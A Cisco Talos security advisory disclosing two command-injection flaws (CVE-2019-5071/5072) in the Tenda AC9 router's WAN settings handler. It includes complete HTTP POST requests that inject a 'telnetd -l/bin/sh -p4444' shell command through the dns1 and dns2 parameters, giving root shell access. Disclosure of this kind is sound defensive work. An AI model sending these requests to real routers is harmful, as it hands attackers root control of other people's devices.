Headline
CVE-2019-5071: TALOS-2019-0861 || Cisco Talos Intelligence Group
An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16multiTRU). A specially crafted HTTP POST request can cause a command injection in the DNS1 post parameters, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.
Summary
An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16_multi_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.
Tested Versions
AC9V1.0 Firmware V15.03.05.16_multi_TRU AC9V1.0 Firmware V15.03.05.14_EN
Product URLs
AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router
CVSSv3 Score
7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-78: Improper Neutralization of Special Elements usedin an OS Command (‘OS Command Injection’)
Details
Tenda AC9 is one of the popular and low cost Smart Dual-Band Gigabit WiFi Router available on many of the online shopping sites like Amazon.
There exists command injection vulnerability in /goform/WanParameterSetting resource. Local authenticated attacker can include arbritary commands to post parameters to execute commands on the Tenda AC9 routerThe attacker can get reverse shell running as root using this commnad injection.
CVE-2019-5071 - Command injection in the DNS1 post parameters
The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.
The exploitable POST request is shown below
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close
wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
CVE-2019-5072 - Command injection in the DNS2 post parameters
The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.
The exploitable POST request is shown below
POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
Host: 10.10.10.1
Content-Length: 193
Accept: */*
Origin: http://10.10.10.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.10.10.1/main.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
Connection: close
wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
Timeline
2019-07-29 - Initial contact
2019-08-07 - Sent plain text file
2019-10-02 - 60+ day follow up
2019-10-21 - 90 day follow up
2019-11-21 - Public Release
Discovered by Amit N. Raut of Cisco Talos.
Related news
Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the mask parameter at /goform/WanParameterSetting.